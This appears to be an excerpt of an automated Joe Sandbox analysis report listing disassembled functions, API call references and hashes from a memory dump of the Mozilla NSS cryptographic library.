Part of subcall function 6C584C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C584CA1
Part of subcall function 6C584C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C584CBE
Part of subcall function 6C584C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C584CD2
Part of subcall function 6C584C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C584D3A

PR_GetCurrentThread.NSS3 ref: 6C57EF9E

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

free.MOZGLUE(00000000), ref: 6C57EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C57F016
free.MOZGLUE(00000000), ref: 6C57F022

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: d3e9c7258b1a06d95c6a491849b68a4212148d36d98d01864458fa4b3adfd0b1
Instruction ID: e1dec8f8ef34ed07f04fb6130d510221f9938a5c9dd6d3c79e901f0940fca6fd
Opcode Fuzzy Hash: d3e9c7258b1a06d95c6a491849b68a4212148d36d98d01864458fa4b3adfd0b1
Instruction Fuzzy Hash: 5A41C171E0020AAFDF01CFA9DC84BEE7BB9AF48358F004029F905A7750E772D9558BA1

Function 6C554860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C554894

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5548CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5548DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C5548FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C554912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C55494A

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 3a8513d86be2e4ec75edd9b3ae5da1569a322227392c91e08c6457c534106e5f
Instruction ID: ea7b716aee0eedda50be004e9af7fd378b0d5f974c5764e8ef1bb99b0208e078
Opcode Fuzzy Hash: 3a8513d86be2e4ec75edd9b3ae5da1569a322227392c91e08c6457c534106e5f
Instruction Fuzzy Hash: 2841D2B1A04345ABE714CF6ACC81BAB73E8AF8461CF40052DEA5597B41F770ED24CB56

Function 6C56CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C56CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C56D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C56D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56D025
PR_NewLock.NSS3 ref: 6C56D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C56D074

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 6722ba64b5dd216d4fd47e62223fef7dd7f2a12607f82e1b56def5ac45d75f57
Instruction ID: ba46f0ee2a864bc24305d8df93056bb77110892eddac133c27b0c17da02f04b7
Opcode Fuzzy Hash: 6722ba64b5dd216d4fd47e62223fef7dd7f2a12607f82e1b56def5ac45d75f57
Instruction Fuzzy Hash: E641D5B0A012118FDB50DF2ACC84386BBA4AF48328F204569DC198BB62E770D885CB95

Function 6C5B3FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5B3FF2

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaMark_Util.NSS3(?), ref: 6C5B4001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C5B400F

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C5B4054

Part of subcall function 6C54BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C54BC24
Part of subcall function 6C54BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C54BC39
Part of subcall function 6C54BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C54BC58
Part of subcall function 6C54BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C54BCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B4070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C5B40CD

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 4d3f6e1071239a697de9094fba8458518df0c917d7f804977d8448551e967723
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 753104B6E00345D7EB109E659C91BBB3BA4AFD460CF144225ED08AF742FB31E9588292

Function 6C552E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C542D1A), ref: 6C552E7E

Part of subcall function 6C5A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C548298,?,?,?,6C53FCE5,?), ref: 6C5A07BF
Part of subcall function 6C5A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5A07E6
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A081B
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A0825

PR_Now.NSS3 ref: 6C552EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C552EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C542D1A), ref: 6C552F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C542D1A), ref: 6C552F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C552F81

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: fd4639696ee9d2207efdf46a9fc2fec332fecc3bc256cf44b66fe758ded17585
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 4D31F57160110087E710C655FC8ABBF7265EF81318FA4497BD41E97AD0EB32986AC751

Function 6C540E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C540A2C), ref: 6C540E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C540A2C), ref: 6C540E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C540A2C), ref: 6C540E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C540A2C), ref: 6C540E90
free.MOZGLUE(00000000), ref: 6C540EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C540A2C), ref: 6C540ED9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 74ccea6de3a25be5bc50f08b1dd3d540fedf2171cf5f9fdcb8d90624420ea312
Instruction ID: d14102f3b5d6cc40d178a05063f2738024b43a1c0c82c3a717a0554e53c34f2d
Opcode Fuzzy Hash: 74ccea6de3a25be5bc50f08b1dd3d540fedf2171cf5f9fdcb8d90624420ea312
Instruction Fuzzy Hash: 21212C72A0028597EB0089769C85F6B72AEDFE1749F398437D81853B02EA61C83582A2

Function 6C54AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C54AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C54AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C54AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C54AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C669500), ref: 6C54AF23

Part of subcall function 6C59F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C59F0C8
Part of subcall function 6C59F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C59F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C54AF37

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: d488f4c922619a15fdb3257abf01cc38250e10293179e6d293834446b12503cd
Instruction ID: 2492ba19c98c248f8d31129916a5e271baaf20d49fbe8a25df0b8502ff051e1c
Opcode Fuzzy Hash: d488f4c922619a15fdb3257abf01cc38250e10293179e6d293834446b12503cd
Instruction Fuzzy Hash: 1B214CB5909200ABEB108F199C41B9A7BE4AFC572CF148325FC649B7C1E731DD1587A7

Function 6C5CEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5CEE85
realloc.MOZGLUE(5683EA68,?), ref: 6C5CEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C5CEEC5

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

htonl.WSOCK32(?), ref: 6C5CEEE3
htonl.WSOCK32(00000000,?), ref: 6C5CEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C5CEF01

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 46711280dc2d1bb72c20bd39e21c5535f202cc09c1b7b40e220372b7ca6a74df
Instruction ID: ff5181d24049cd906218db8775cb22ef7702a997a73633a9ba001a6306ba8203
Opcode Fuzzy Hash: 46711280dc2d1bb72c20bd39e21c5535f202cc09c1b7b40e220372b7ca6a74df
Instruction Fuzzy Hash: B621E231A002149FCF209F68DC81B9AB7A4EF49398F14812DEC199B741E370ED14CBEA

Function 6C547F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C547F68

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C547F7B

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C547FA7

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C66919C,?), ref: 6C547FBB

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C547FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C66915C,00000014), ref: 6C547FFE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: d517cfdd201b36970f2f21e8a84a59c55c487f2955dbe3c1d1876e8165e3c95e
Instruction ID: ee2695e9414f375770c21fdc2b169d2c85609aaa8e37b3abd09830402b489b33
Opcode Fuzzy Hash: d517cfdd201b36970f2f21e8a84a59c55c487f2955dbe3c1d1876e8165e3c95e
Instruction Fuzzy Hash: 6411E771D00204ABF7109A269C40BBB76ECDF8569CF104629FC5AD2A41F720A948C6A6

Function 6C54BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6C5CDC29,?), ref: 6C54BE64

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C5CDC29,?), ref: 6C54BE78

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C5CDC29,?), ref: 6C54BE96

Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C5CDC29,?), ref: 6C54BEBB

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6C5CDC29,?), ref: 6C54BEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C5CDC29,?), ref: 6C54BEF3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: 97be05e07cf34cc3884c7a865b80dfb13fab820a27e99f1a1c441163d33cc1b8
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: 1211B775E002059BEB009B659D45FAF3BA8EFC5358F144028ED09EB780EB31DD19C7A1

Function 6C589850 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C58985B

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000038), ref: 6C589871

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C66D9B0,?), ref: 6C5898A2

Part of subcall function 6C59E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C59E245
Part of subcall function 6C59E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C59E254

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5898B7
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C589901
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C589910

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

